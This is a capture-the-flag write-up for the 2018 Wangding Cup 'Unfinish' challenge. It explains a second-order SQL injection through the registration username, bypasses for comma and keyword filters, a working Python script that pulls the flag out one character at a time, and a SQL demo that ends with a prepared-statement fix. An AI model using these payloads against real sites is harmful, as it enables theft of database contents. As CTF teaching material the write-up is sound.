[网鼎杯2018]Unfinish
Second-order SQL injection. The injection point is the username submitted to register.php: the value is stored at registration time and its effect is only visible after logging in.
1. Guess the query. The registration INSERT is presumably of the form:
insert table values ('email','username','password')
2. The table name (flag) is guessed. The word "information" is filtered, so information_schema cannot be used to enumerate tables. The MySQL version is 5.5.64, and the sys schema only ships with MySQL 5.7.7 or later, so that route is closed as well.
3. Change the email address on every registration: each extraction step registers and logs in as a fresh account.
4. Commas are filtered, so the three-argument form substr(str, pos, len) cannot be used. Use the comma-free form instead:
substr(str from pos for len)
5. If + in the form body is decoded as a space, URL-encode it as %2B (requests already does this when data is passed as a dict). XOR (^) can be used in place of + as well.
import requests
from bs4 import BeautifulSoup
import re

url = 'http://3facbb99-4fb4-44fa-8fae-fa28575f788a.node4.buuoj.cn:81/'
a = ''
# substr(... from 0 for 1) returns '' in MySQL (ascii('') = 0), so start at position 1
for i in range(1, 60):
    # every registration needs an unused email address
    email = 'eqwews1@131416024w' + str(i)
    # insert table values ('email','username','password')
    # '0' + ascii(c) + '0' evaluates to the ASCII code of the i-th flag character,
    # which is what gets stored as the username; from/for avoids the filtered comma
    payload = "0' + ascii(substr((select * from flag) from " + str(i) + " for 1))+'0"
    register = {'email': email, 'username': payload, 'password': '0'}
    login = {'email': email, 'password': '0'}
    # requests form-encodes '+' as %2B, so it is not decoded as a space server-side
    r1 = requests.post(url + 'register.php', data=register)
    r2 = requests.post(url + 'login.php', data=login, allow_redirects=True)
    soup = BeautifulSoup(r2.text, 'html.parser')
    # the logged-in page echoes the stored username inside a <span>
    a += chr(int(soup.span.string.strip()))
    print(a)
    # print(soup.find_all('span'))
    # print(re.findall(".*?</span>", r2.text)[0].replace('</span>', '').strip(), end='')  # plain re instead of bs4
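The injected INSERT from the notes above, carried through in MySQL as an added example (this is not code from the original writeup; the users/flag table layout, the column names and the sample flag value are constructed for the demo). It shows the + and ^ variants of the comma-free payload being evaluated at registration time and read back at login, and the prepared-statement form of the same INSERT, which stores the payload as plain text instead of evaluating it:

```sql
-- Added example (not from the original writeup). Assumed schema: a users table
-- that register.php inserts into and a single-column flag table; the flag value
-- is constructed for the demo. MySQL 5.5 syntax throughout.
CREATE TABLE users (email VARCHAR(64), username VARCHAR(64), password VARCHAR(64));
CREATE TABLE flag  (flag VARCHAR(64));
INSERT INTO flag VALUES ('flag{demo}');

-- 1. What register.php effectively executes when the submitted username is
--      0' + ascii(substr((select * from flag) from 1 for 1))+'0
--    The quotes close the string literal, the arithmetic is evaluated, and the
--    numeric result lands in the username column. substr(... FROM n FOR 1)
--    needs no commas. The subquery must return exactly one row and one column,
--    and must not read from the table being inserted into (MySQL rejects that).
INSERT INTO users VALUES ('u1@example.com',
    '0' + ascii(substr((select * from flag) from 1 for 1))+'0', '0');

-- 2. XOR variant: '0' ^ n ^ '0' is n as well, and ^ is not mangled by
--    form decoding the way an unencoded + (decoded as a space) is.
INSERT INTO users VALUES ('u2@example.com',
    '0' ^ ascii(substr((select * from flag) from 2 for 1)) ^ '0', '0');

-- 3. What login.php then displays: the stored username is the ASCII code of
--    the 1st / 2nd flag character, which the extraction script feeds to chr().
SELECT username FROM users WHERE email = 'u1@example.com' AND password = '0';
SELECT username FROM users WHERE email = 'u2@example.com' AND password = '0';

-- 4. Fixed form: bind the value instead of splicing it into the statement.
--    The identical payload is stored verbatim as text and never evaluated.
PREPARE ins FROM 'INSERT INTO users VALUES (?, ?, ?)';
SET @e = 'u3@example.com';
SET @u = '0'' + ascii(substr((select * from flag) from 1 for 1))+''0';
SET @p = '0';
EXECUTE ins USING @e, @u, @p;
DEALLOCATE PREPARE ins;
SELECT username FROM users WHERE email = 'u3@example.com';
```

Step 4 is the check to run when auditing the application side: if the string read back equals the literal payload rather than a number, the registration query is parameterised and the second-order vector is closed.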